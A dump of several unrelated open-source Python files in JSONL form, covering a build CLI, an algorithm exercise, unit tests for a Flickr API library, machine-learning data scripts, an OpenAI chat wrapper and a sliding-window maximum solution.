args.version:\n print(\"mbuild %s\" % CURRENT_VERSION)\n sys.exit(0)\n elif args.help or len(sys.argv) < 2:\n parser.print_help()\n sys.exit(0)\n else:\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yifengyou/mbuild","sub_path":"mbuild.py","file_name":"mbuild.py","file_ext":"py","file_size_in_byte":22417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"73408741449","text":"\"\"\"\n못생긴 수(31p) \n\n못생긴 수란 오직 2, 3, 5만을 소인수로 가지는 수를 의미한다. 1은 못생긴 수라고 가정한다. 이때 n번째 못생긴 수를 찾는 프로그램을 작성하시오. 예를 들어 11번째 못생긴 수는 15입니다.\n(1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, ...)\n\n입력\n첫째 줄에 n이 입력(1부터 1000까지)\n\n출력\nn번째 못생긴 수 출력\n\"\"\"\n\nn=int(input())\n\ndp=[0]*n\ndp[0]=1\n\ni2,i3,i5=0,0,0\nnext2,next3,next5=2,3,5\n\nfor i in range(1,n):\n\tdp[i]=min(next2,next3,next5)\n\n\t#못생긴 수에 2 or 3 or 5를 곱한 수도 못생긴 수\n\n\tif dp[i]==next2:\n\t\ti2+=1\n\t\tnext2=dp[i2]*2\n\tif dp[i]==next3:\n\t\ti3+=1\n\t\tnext3=dp[i3]*3\n\tif dp[i]==next5:\n\t\ti5+=1\n\t\tnext5=dp[i5]*5\n\nprint(dp[n-1])\n\t\t","repo_name":"YoungWoongJoo/Learning-Algorithm-With-Python","sub_path":"Dynamic Programming/practice5.py","file_name":"practice5.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"39027666041","text":"from data_loading import gazeRE_DataLoader\nfrom features.feature_extractor import LongestVisitFeatureExtractor, extract_training_data\n\nif __name__ == '__main__':\n # Set the minimal number of fixations for a visit and the minimal visit duration to be considered\n min_fixations = 0\n min_visit_duration = 3\n\n # Set the feature export directory\n target_dir = \"./\"\n\n # Intialize the gazeRE_Dataloader which loads the dataset\n dataloader = gazeRE_DataLoader(data_dir=\"data\", googleNQ=True, gREL=True)\n\n # Initialize the FeatureExtractor with LongestVisitFeatureExtractor which takes the longest visit for each paragraph\n feature_extractor = LongestVisitFeatureExtractor(\n min_visit_duration=min_visit_duration, min_fixations=min_fixations, screen_width=2560, screen_height=1440\n )\n\n # Extract the feature file for the g-REL corpus\n d_grel = extract_training_data(study_data=dataloader.grel, target_dir=target_dir,\n feature_extractor=feature_extractor)\n\n # Extract the feature file for the Google NQ corpus\n d_nq = extract_training_data(study_data=dataloader.google_nq, target_dir=target_dir,\n feature_extractor=feature_extractor)\n","repo_name":"DFKI-Interactive-Machine-Learning/gazeRE-dataset","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41013889408","text":"import flickr_api as f\nimport unittest\n\n\nclass TestPhotoSizes(unittest.TestCase):\n def test_video_largest_size(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n ),\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000)\n },\n media=\"video\")\n self.assertEqual(\"HD MP4\", p._getLargestSizeLabel())\n\n def test_video_none_entry(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n ),\n 700:\n dict(\n media=\"video\",\n url=\"v@url2\",\n source=\"v@source2\",\n width=None,\n height=None)\n },\n media=\"video\")\n self.assertEqual(\"HD MP4\", p._getLargestSizeLabel())\n\n def test_video_output_filename(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n )\n },\n media=\"video\")\n self.assertEqual(\"source.mp4\", p._getOutputFilename(\"source\", \"HD MP4\"))\n self.assertEqual(\"source.mp4\", p._getOutputFilename(\"source.mp4\", \"HD MP4\"))\n self.assertEqual(\"source.jpeg\", p._getOutputFilename(\"source.jpeg\", \"HD MP4\"))\n\n def test_photo_output_filename(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p/source.jpg\",\n width=2000,\n height=2000)\n },\n media=\"photo\")\n self.assertEqual(\"source.jpg\", p._getOutputFilename(\"source\", \"Large\"))\n self.assertEqual(\"source.jpg\", p._getOutputFilename(\"source.jpg\", \"Large\"))\n self.assertEqual(\"source.jpeg\", p._getOutputFilename(\"source.jpeg\", \"Large\"))\n\n\n def test_photo_largest_size(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n ),\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000)\n },\n media=\"photo\")\n self.assertEqual(\"Large\", p._getLargestSizeLabel())\n\n def test_photo_largest_size_original(self):\n \"\"\"Test that the original size is returned if it is as big as the largest size\"\"\"\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000),\n \"Original\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000)\n },\n media=\"photo\")\n self.assertEqual(\"Original\", p._getLargestSizeLabel())\n\n def test_parse_inline_sizes(self):\n self.maxDiff = None\n sizes = f.objects._parse_inline_sizes({\n 'title':\n 'Noir comme le soleil',\n 'owner':\n f.objects.Person(id=\"qwerty\", token=\"abcde\"),\n 'id':\n 16180339,\n 'ispublic':\n True,\n 'isfriend':\n False,\n 'isfamily':\n False,\n 'url_c':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_c.jpg',\n 'height_c':\n 534,\n 'width_c':\n '800',\n 'url_l':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_b.jpg',\n 'height_l':\n '684',\n 'width_l':\n '1024',\n 'url_o':\n 'https://farm5.staticflickr.com/X/46284324564_2baac8acd5_o.jpg',\n 'height_o':\n '4016',\n 'width_o':\n '6016',\n 'media':\n 'photo',\n })\n self.assertEqual({\n 'Original': {\n 'label':\n 'Original',\n 'width':\n '6016',\n 'height':\n '4016',\n 'source':\n 'https://farm5.staticflickr.com/X/46284324564_2baac8acd5_o.jpg',\n 'url':\n 'https://www.flickr.com/photos/qwerty/16180339/sizes/o/',\n 'media':\n 'photo'\n },\n 'Medium 800': {\n 'label':\n 'Medium 800',\n 'width':\n '800',\n 'height':\n 534,\n 'source':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_c.jpg',\n 'url':\n 'https://www.flickr.com/photos/qwerty/16180339/sizes/c/',\n 'media':\n 'photo'\n },\n 'Large': {\n 'label':\n 'Large',\n 'width':\n '1024',\n 'height':\n '684',\n 'source':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_b.jpg',\n 'url':\n 'https://www.flickr.com/photos/qwerty/16180339/sizes/l/',\n 'media':\n 'photo'\n },\n }, sizes)\n","repo_name":"alexis-mignon/python-flickr-api","sub_path":"test/test_parse_sizes.py","file_name":"test_parse_sizes.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"16"}
+{"seq_id":"41793445934","text":"import os.path\n\nimport yaml\n\nfrom agents.agents_factory import create_agent_by_type\nfrom agents.base_agent import BASE_AGENT_TYPE\nfrom config.constants import DEFAULT_START_PROMPT_PATH, INITIAL_USER_INPUT, PRESETS_DIR\n\n\nclass AgentConfig:\n # consturctor\n def __init__(self, commands_set_path=None,\n model='gpt-3.5-turbo', max_tokens=4000,\n temperature=0.1, top_p=1, frequency_penalty=0, presence_penalty=0,\n include_constraints_resources_prompt=True, include_response_format_prompt=True,\n include_commands_set=True, save_model=True, autonomous=False, type=BASE_AGENT_TYPE,\n prompt_start_path=DEFAULT_START_PROMPT_PATH,\n default_user_input=INITIAL_USER_INPUT, max_personal_goals=5):\n\n if not prompt_start_path:\n prompt_start_path = DEFAULT_START_PROMPT_PATH\n\n self.config_map = {\n 'type': type,\n 'model': model,\n 'top_p': top_p,\n 'save_model': save_model,\n 'autonomous': autonomous,\n 'max_tokens': max_tokens,\n 'temperature': temperature,\n 'prompt_start_path': prompt_start_path,\n 'presence_penalty': presence_penalty,\n 'frequency_penalty': frequency_penalty,\n 'commands_set_path': commands_set_path,\n 'default_user_input': default_user_input,\n 'max_personal_goals': max_personal_goals,\n 'include_commands_set': include_commands_set,\n 'include_response_format_prompt': include_response_format_prompt,\n 'include_constraints_resources_prompt': include_constraints_resources_prompt,\n\n }\n\n def get(self, key):\n return self.config_map[key]\n\n def to_dict(self):\n return self.config_map\n\n def __dict__(self):\n return self.config_map\n\n @staticmethod\n def from_dict(dict_input):\n return AgentConfig(**dict_input)\n\n @staticmethod\n def from_preset(name):\n path = os.path.join(PRESETS_DIR, name)\n\n if not os.path.exists(path):\n raise Exception(\"Preset file does not exist\")\n\n with open(path, 'r') as stream:\n try:\n preset = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n raise Exception(\"Error loading preset file: \" + str(exc))\n\n config = preset['config']\n\n name = preset['name']\n role = preset['role']\n agent_type = config['type']\n\n return create_agent_by_type(name, role, config, agent_type)\n","repo_name":"SherifNeamatalla/hal9000_world","sub_path":"agents/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"36337865101","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.tree import export_graphviz\r\nfrom sklearn import tree\r\nfrom io import StringIO\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom matplotlib import pyplot as plt\r\nimport graphviz\r\n\r\ntc = pd.read_csv('./customer_churn.csv')\r\n\r\n# print(\"Row:\", tc.shape[0])\r\n# print(\"\\nColumn:\", tc.shape[1])\r\n# print(\"\\nFeatures: \\n\", tc.columns.tolist())\r\n# print(\"\\nMissing Values: \\n\", tc.isnull().sum().values.sum())\r\n# print(\"\\nUnique Values: \\n\", tc.nunique())\r\n\r\ntc['TotalCharges'] = tc['TotalCharges'].replace(\" \", np.nan)\r\ntc =tc[tc['TotalCharges'].notnull()]\r\ntc= tc.reset_index()[tc.columns]\r\ntc['TotalCharges'] = tc['TotalCharges'].astype(float)\r\n# tc.head()\r\n\r\nreplace_cols = ['OnlineSecurity', 'OnlineBackup', 'DeviceProtection',\r\n 'TechSupport','StreamingTV', 'StreamingMovies']\r\nfor i in replace_cols:\r\n tc[i] = tc[i].replace({\"No internet service\" : \"No\"})\r\n# print(tc['OnlineSecurity'].head(15))\r\n\r\ntc[\"SeniorCitizen\"] = tc[\"SeniorCitizen\"].replace({1:\"Yes\", 0:\"No\"})\r\n\r\ndef tenure_cat(tc):\r\n \r\n if tc[\"tenure\"] <= 12:\r\n return \"Tenure_0-12\"\r\n \r\n elif (tc[\"tenure\"] > 12) & (tc[\"tenure\"] <= 24 ):\r\n return \"Tenure_12-24\"\r\n \r\n elif (tc[\"tenure\"] > 24) & (tc[\"tenure\"] <= 48) :\r\n return \"Tenure_24-48\"\r\n \r\n elif (tc[\"tenure\"] > 48) & (tc[\"tenure\"] <= 60) :\r\n return \"Tenure_48-60\"\r\n \r\n elif tc[\"tenure\"] > 60 :\r\n return \"Tenure_gt_60\"\r\n \r\ntc[\"tenure_grp\"] = tc.apply(lambda tc:tenure_cat(tc),\r\n axis = 1)\r\n\r\n#customer id col\r\nId_col = ['customerID']\r\n#Target columns\r\ntarget_col = [\"Churn\"]\r\n#categorical columns\r\ncat_cols = tc.nunique()[tc.nunique() < 6].keys().tolist()\r\ncat_cols = [x for x in cat_cols if x not in target_col]\r\n# print(cat_cols)\r\n\r\n#numerical columns\r\nnum_cols = [x for x in tc.columns if x not in cat_cols + target_col + Id_col]\r\n\r\n#Binary columns with 2 values\r\nbin_cols = tc.nunique()[tc.nunique() == 2].keys().tolist()\r\n# print(\" \")\r\n\r\nmulti_cols = [i for i in cat_cols if i not in bin_cols]\r\n\r\n#Label encoding Binary columns\r\nle = LabelEncoder()\r\n# print(bin_cols)\r\nfor i in bin_cols :\r\n # print(i)\r\n tc[i] = le.fit_transform(tc[i])\r\n \r\n#Duplicating columns for multi value columns\r\ntc = pd.get_dummies(data = tc,columns = multi_cols )\r\n# print(tc.head())\r\n\r\nstd = StandardScaler()\r\nscaled = std.fit_transform(tc[num_cols])\r\nscaled = pd.DataFrame(scaled,columns=num_cols)\r\n# print(scaled)\r\n\r\ntc = tc.drop(columns=['tenure_grp_Tenure_12-24', 'tenure_grp_Tenure_0-12', 'tenure_grp_Tenure_24-48', 'tenure_grp_Tenure_48-60', 'tenure_grp_Tenure_gt_60'])\r\n\r\ndf_tc_og = tc.copy()\r\ntc = tc.drop(columns = num_cols,axis = 1)\r\ntc = tc.merge(scaled,left_index=True,right_index=True,how = \"left\")\r\n\r\nbin_cols = tc.nunique()[tc.nunique() == 2].keys().tolist()\r\nle = LabelEncoder()\r\n# print(bin_cols)\r\nfor i in bin_cols :\r\n # print(i)\r\n tc[i] = le.fit_transform(tc[i])\r\n \r\n# print(tc.head())\r\n# print(tc.columns)\r\n\r\nId_col = ['customerID']\r\ntarget_col = ['Churn']\r\n\r\n# print(tc[\"tenure_grp\"])\r\n\r\ncat_cols = tc.nunique()[tc.nunique() < 6]\r\n# print(cat_cols)\r\n\r\ncols = [i for i in tc.columns if i not in Id_col + target_col ]\r\n# print(cols)\r\n\r\nx = df_tc_og[cols]\r\ny = df_tc_og[target_col]\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(x,y,test_size = 0.2)\r\n\r\n# print(tc)\r\nmodel_dt_2 = DecisionTreeClassifier(random_state = 1, max_depth = 2)\r\nmodel_dt_2.fit(x_train, y_train)\r\nmodel_dt_2_score_train = model_dt_2.score(x_train, y_train)\r\nprint(\"Training Score depth-2 : \", model_dt_2_score_train)\r\nmodel_dt_2_score_test = model_dt_2.score(x_test, y_test)\r\nprint(\"Testing Score depth-2 : \", model_dt_2_score_test)\r\n\r\n# depth-8\r\nmodel_dt_8 = DecisionTreeClassifier(random_state=1, max_depth=8, criterion = \"entropy\")\r\nmodel_dt_8.fit(x_train, y_train)\r\nmodel_dt_8_score_train = model_dt_8.score(x_train, y_train)\r\nprint(\"Training score depth-8 : \",model_dt_8_score_train)\r\nmodel_dt_8_score_test = model_dt_8.score(x_test, y_test)\r\nprint(\"Testing score depth-8 : \",model_dt_8_score_test)\r\n\r\ndot_data = tree.export_graphviz(model_dt_8, out_file=None, \r\n feature_names=cols, \r\n class_names=target_col,\r\n filled=True)\r\n\r\n# Draw graph\r\ngraph = graphviz.Source(dot_data, format=\"png\") \r\ngraph","repo_name":"RathodKaransinh/Telco-Customer-Churn-Analysis","sub_path":"cust_churn_analysis.py","file_name":"cust_churn_analysis.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27572327847","text":"from threading import Thread\r\nfrom random import randint\r\nfrom time import sleep\r\n\r\n\r\ndef main():\r\n print(\"Start Fishing Trip.\")\r\n fish_on = randint(1, 10)\r\n\r\n setup_thread = Thread(target=setup_rig)\r\n cast_thread = Thread(target=cast_line)\r\n hook_thread = Thread(target=hook_fish, args=(fish_on,))\r\n\r\n setup_thread.start()\r\n cast_thread.start()\r\n hook_thread.start()\r\n\r\n setup_thread.join()\r\n cast_thread.join()\r\n hook_thread.join()\r\n\r\n if fish_on < 4:\r\n print(\"That didn't take long.\")\r\n elif fish_on in range(4, 8):\r\n print(\"Good day to fish.\")\r\n else:\r\n print(\"Seemed like nothing was going to bite today.\")\r\n\r\n print(\"Fishing Trip complete!\")\r\n\r\n\r\ndef setup_rig():\r\n print(\"Setup saltwater fishing rig.\")\r\n\r\n\r\ndef cast_line():\r\n print(\"Cast line and wait...\")\r\n\r\n\r\ndef hook_fish(wait):\r\n sleep(wait)\r\n print(\"Set hook and reel in fish.\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"k3rl15/skill_captain_python_advanced","sub_path":"Day 5/concurrency_multithreading.py","file_name":"concurrency_multithreading.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5185104221","text":"from abc import ABCMeta, abstractmethod\nfrom dateutil import rrule\nimport datetime\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nimport alphai_calendars as mcal\n\nfrom alphai_feature_generation.cleaning import (\n select_between_timestamps,\n remove_duplicated_symbols_ohlcv,\n slice_data_dict\n)\n\nlogger = logging.getLogger(__name__)\n\nMETHOD_FIXED = 'fixed'\nMETHOD_ANNUAL = 'annual'\nMETHOD_LIQUIDITY = 'liquidity'\nMETHOD_LIQUIDITY_DAY = 'liquidity_day'\nMETHOD_FIXED_HISTORICAL = 'fixed_historical'\nHISTORICAL_UNIVERSE_COLUMNS = ('start_date', 'end_date', 'assets')\nUPDATE_FREQUENCIES = ('daily', 'weekly', 'monthly', 'yearly')\nFREQUENCY_RRULE_MAP = {'daily': rrule.DAILY, 'weekly': rrule.WEEKLY, 'monthly': rrule.MONTHLY, 'yearly': rrule.YEARLY}\nOHLCV = ('open', 'high', 'low', 'close', 'volume')\n\n\nclass AbstractUniverseProvider(metaclass=ABCMeta):\n @abstractmethod\n def get_historical_universes(self, data_dict):\n \"\"\"\n Get a dataframe with arrays of all the relevant equities between two dates, categorised by date ranges.\n :param data_dict: dict of dataframes\n :return: Dataframe with three columns ['start_date', 'end_date', 'assets']\n \"\"\"\n raise NotImplementedError\n\n\nclass VolumeUniverseProvider(AbstractUniverseProvider):\n def __init__(self,\n n_assets,\n ndays_window,\n update_frequency,\n calendar_name,\n dropna\n ):\n \"\"\"\n Provides assets according to an input universe dictionary indexed by year\n :param nassets: Number of assets to select\n :param ndays_window: Number of days over which to calculate the period liquidity\n :param update_frequency: str in ['daily', 'weekly', 'monthly', 'yearly']: updates of the historical universe\n :param exchange: the name of the calendar\n :param dropna: if True drops columns containing any nan after gaps-filling\n\n \"\"\"\n self._nassets = n_assets\n self._ndays_window = ndays_window\n self._update_frequency = update_frequency\n self._dropna = dropna\n\n self._exchange_calendar = mcal.get_calendar(calendar_name)\n\n self._nminutes_window = self._ndays_window * self._exchange_calendar.get_minutes_in_one_day()\n self._rrule = FREQUENCY_RRULE_MAP[self._update_frequency]\n\n def _get_universe_at(self, date, data_dict):\n assert (type(date) == datetime.date) or (type(date) == pd.Timestamp)\n\n selected_daily_data_dict = slice_data_dict(data_dict, slice_start=-self._ndays_window)\n assert len(selected_daily_data_dict['volume']) == self._ndays_window\n\n no_duplicates_data_dict = remove_duplicated_symbols_ohlcv(selected_daily_data_dict)\n universe_at_date = np.array(list(no_duplicates_data_dict['volume'].sum().sort_values(ascending=False).index))\n\n return universe_at_date[:self._nassets]\n\n def get_historical_universes(self, data_dict):\n\n historical_universes = pd.DataFrame(columns=HISTORICAL_UNIVERSE_COLUMNS)\n relevant_dict = {k: data_dict[k] for k in ('volume', 'close')}\n relevant_dict['volume'] = relevant_dict['volume'].resample('1D').sum().dropna(axis=[0, 1], how='all')\n relevant_dict['close'] = relevant_dict['close'].resample('1D').last().dropna(axis=[0, 1], how='all')\n\n data_timezone = relevant_dict['volume'].index.tz\n start_date = relevant_dict['volume'].index[self._ndays_window + 1]\n end_date = relevant_dict['volume'].index[-1]\n\n rrule_dates = list(rrule.rrule(self._rrule, dtstart=start_date, until=end_date))\n rrule_dates[-1] = end_date\n\n if len(rrule_dates) > 1:\n for idx, (period_start_date, period_end_date) in enumerate(zip(rrule_dates[:-1], rrule_dates[1:])):\n logger.debug('Calculating historical universe from: {} - {}'.format(str(period_start_date),\n str(period_end_date)))\n\n end_timestamp = pd.Timestamp(period_start_date, tz=data_timezone)\n\n historical_universes.loc[idx] = [\n period_start_date.date(),\n period_end_date.date(),\n self._get_universe_at(period_start_date.date(),\n select_between_timestamps(relevant_dict, end_timestamp=end_timestamp))\n ]\n historical_universes.iloc[-1]['end_date'] = end_date.date()\n\n elif len(rrule_dates) == 1:\n end_timestamp = pd.Timestamp(start_date, tz=data_timezone)\n historical_universes.loc[0] = [\n start_date.date(),\n end_date.date(),\n self._get_universe_at(start_date,\n select_between_timestamps(relevant_dict, end_timestamp=end_timestamp))\n ]\n return historical_universes\n","repo_name":"alpha-i/library-feature-generation","sub_path":"alphai_feature_generation/universe.py","file_name":"universe.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"33242643589","text":"import os\r\nimport sys\r\nfrom src.exceptions import CustomException\r\nfrom src.logger import logging\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom src.components.data_transformation import DataTransformation, DataTransformationConfig\r\nfrom dataclasses import dataclass\r\nfrom src.components.model_training import Trained_Model\r\n\r\n@dataclass\r\nclass DataIngestionConf:\r\n train_data_path = os.path.join('artifacts','train.csv')\r\n test_data_path = os.path.join('artifacts','test.csv')\r\n raw_data_path = os.path.join('artifacts','raw.csv')\r\n\r\nclass DataIngestion:\r\n def __init__(self):\r\n self.ingestion_conf = DataIngestionConf()\r\n \r\n def initiate_data(self):\r\n logging.info(\"We have started the data ingestion part now...\")\r\n try:\r\n df = pd.read_csv(\"C:/Users/Yashkumar Dubey/Documents/Desktop1/youtube/ML CICD Pipe/notebooks/data/laptop_data_cleaned.csv\")\r\n logging.info(\"Reaing the Dataset as Dataframe...\")\r\n os.makedirs(os.path.dirname(self.ingestion_conf.train_data_path),exist_ok=True)\r\n df.to_csv(self.ingestion_conf.raw_data_path,index=False,header=True)\r\n logging.info(\"Train test split is initiated...\")\r\n train_set,test_set = train_test_split(df,test_size=0.2,random_state=52)\r\n train_set.to_csv(self.ingestion_conf.train_data_path,index=False,header=True)\r\n test_set.to_csv(self.ingestion_conf.test_data_path,index=False,header=True)\r\n logging.info(\"Ingestion is completed\")\r\n return(\r\n self.ingestion_conf.train_data_path,\r\n self.ingestion_conf.test_data_path\r\n\r\n )\r\n except Exception as e:\r\n raise CustomException(e,sys)\r\n \r\n\r\nif __name__==\"__main__\":\r\n obj = DataIngestion()\r\n train_data,test_data = obj.initiate_data()\r\n transform = DataTransformation()\r\n new_train_data,new_test_data,new_y_train,new_y_test = transform.initiate_data_transformation(train_data,test_data)\r\n modeltrainer=Trained_Model()\r\n print(modeltrainer.initialise_training(new_train_data,new_test_data,new_y_train,new_y_test))\r\n\r\n\r\n","repo_name":"YashAPro1/ML-CICD-Pipeline","sub_path":"src/components/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6623525131","text":"import datetime\n\n# import classes\nfrom app.models.base_model import BaseModel\nfrom app.models import db\n\n\nclass Booth(db.Model, BaseModel):\n\t# table name\n\t__tablename__ = 'booths'\n\t# displayed fields\n\tvisible = ['id', 'user_id', 'stage_id', 'points', 'summary', 'type', 'logo_url', 'url', 'name', 'created_at', 'updated_at']\n\n\t# columns definitions\n\tid = db.Column(db.Integer, primary_key=True)\n\tuser_id = db.Column(\n\t\tdb.String(40),\n\t\tdb.ForeignKey('users.id'),\n\t\tnullable=True\n\t)\n\tuser = db.relationship('User')\n\tstage_id = db.Column(\n\t\tdb.String(40),\n\t\tdb.ForeignKey('stages.id')\n\t)\n\tstage = db.relationship('Stage')\n\tsummary = db.Column(db.Text)\n\ttype = db.Column(db.String)\n\tpoints = db.Column(db.Integer)\n\tname = db.Column(db.String(255))\n\turl = db.Column(db.String(255))\n\tlogo_url = db.Column(db.String(255))\n\tcreated_at = db.Column(db.DateTime)\n\tupdated_at = db.Column(db.DateTime)\n\n\tdef __init__(self):\n\t\tself.created_at = datetime.datetime.now()\n\t\tself.updated_at = datetime.datetime.now()\n\t\tself.summary = ''\n\t\tself.points = 0\n","repo_name":"devsummit/backend","sub_path":"app/models/booth.py","file_name":"booth.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"}
+{"seq_id":"6576364145","text":"'''Have a conversation with Aria, powered by OpenAI chat completion'''\n\nimport json\nimport openai\n\nclass Conversation:\n '''Object-class containing the ongoing conversation'''\n\n def __init__(self):\n '''Constructs the conversation with the necessary settings'''\n self.reset()\n with open('./data/keys.json', encoding='UTF-8') as keys:\n openai.api_key = json.load(keys)['OPEN_AI_KEY']\n\n def get_response(self, prompt: str):\n '''Sends a message to the assistant and gets the response'''\n try:\n self.messages.append({'role': 'user', 'content': prompt})\n completion = openai.ChatCompletion.create(\n model=self.model,\n messages=self.messages,\n max_tokens=self.max_tokens\n )\n self.messages.append(completion.choices[0]['message'])\n return completion.choices[0]['message']['content']\n except Exception:\n return \"I'm sorry, I don't understand.\"\n\n def reset(self):\n '''Clears all messages and sets settings back to default'''\n with open('./data/conversationSettings.json', encoding='UTF-8') as settings:\n data = json.load(settings)\n self.messages = data['settings']\n self.model = data['model']\n self.temperature = data['temperature']\n self.max_tokens = data['max_tokens']\n\nif __name__ == '__main__':\n chat = Conversation()\n print(chat.get_response(\"Whats your name\"))\n","repo_name":"AJWestley/Aria","sub_path":"Skills/conversation.py","file_name":"conversation.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71970626249","text":"\"\"\"\nYou are given an array of integers nums, there is a sliding window of size k which is moving from the very left of the array to the very right.\nYou can only see the k numbers in the window. Each time the sliding window moves right by one position.\n\nReturn the max sliding window.\nnums = [1,3,-1,4,5], k = 3\n\n[3,1,-1,4,5] => [3,4,-1,4,5]\n\n[0]=0\n[1]=1\n[2]=2\n\nidx=0 => 1\nleft=1 => 3\n\nidx=0 => 3\nleft=1 => 1\n\nha[0]=1\nha[1]=0\nha[3]=1\n\n\n\n\n\"\"\"\nimport math\nfrom typing import List\n\nimport test2\n\n\nclass Solution:\n\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n if k == 1:\n return nums\n if k == len(nums):\n return [max(nums)]\n\n handleByOrgId = {}\n handleByCurId = {}\n\n def heapDown(idx):\n left = 2 * idx + 1\n right = 2 * idx + 2\n maxIdx = idx\n\n if not (left >= k and right >= k):\n if left < k and nums[maxIdx] < nums[left]:\n maxIdx = left\n if right < k and nums[maxIdx] < nums[right]:\n maxIdx = right\n if maxIdx != idx:\n temp = nums[idx]\n nums[idx] = nums[maxIdx]\n nums[maxIdx] = temp\n\n orgIdForIdx = handleByCurId[idx]\n handleByOrgId[orgIdForIdx] = maxIdx\n\n orgIdForMaxId = handleByCurId[maxIdx]\n handleByOrgId[orgIdForMaxId] = idx\n\n handleByCurId[idx] = orgIdForMaxId\n handleByCurId[maxIdx] = orgIdForIdx\n\n heapDown(maxIdx)\n\n def heapUp(idx):\n while ((idx - 1) / 2) >= 1 and idx > 1:\n parent = math.floor((idx - 1) / 2)\n if nums[parent] < nums[idx]:\n temp = nums[idx]\n nums[idx] = nums[parent]\n nums[parent] = temp\n\n orgIdForIdx = handleByCurId[idx]\n handleByOrgId[orgIdForIdx] = parent\n\n orgIdForParent = handleByCurId[parent]\n handleByOrgId[orgIdForParent] = idx\n\n handleByCurId[idx] = orgIdForParent\n handleByCurId[parent] = orgIdForIdx\n idx = parent\n else:\n break\n\n def heapUpOrDown(idx):\n parent = math.floor((idx - 1) / 2)\n if parent >= 1 and nums[parent] < nums[idx]:\n heapUp(idx)\n else:\n heapDown(idx)\n\n def heapify():\n j = k\n while j > 0:\n heapDown(j)\n j -= 1\n\n firstMaxVal = 0\n i = 0\n while i < k:\n if i != 0:\n handleByOrgId[i] = i\n handleByCurId[i] = i\n firstMaxVal = max(firstMaxVal, nums[i])\n i += 1\n\n returnList = [firstMaxVal]\n handleByOrgId[k] = k\n handleByCurId[k] = k\n heapify()\n\n p = k + 1\n q = 1\n while p < len(nums):\n returnList.append(nums[1])\n updateIdx = handleByOrgId[q]\n\n q = q + 1\n nums[updateIdx] = nums[p]\n handleByOrgId[p] = updateIdx\n handleByCurId[updateIdx] = p\n heapUpOrDown(updateIdx)\n p = p + 1\n\n returnList.append(nums[1])\n return returnList\n\n\nnums = [1,3,-1,-3,5,3,6,7]\nk =3\nsl = Solution()\nprint(sl.maxSlidingWindow(nums, k))\n","repo_name":"shashiram/Data-Structures-and-Algorithms","sub_path":"MaxSlidingWindow.py","file_name":"MaxSlidingWindow.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
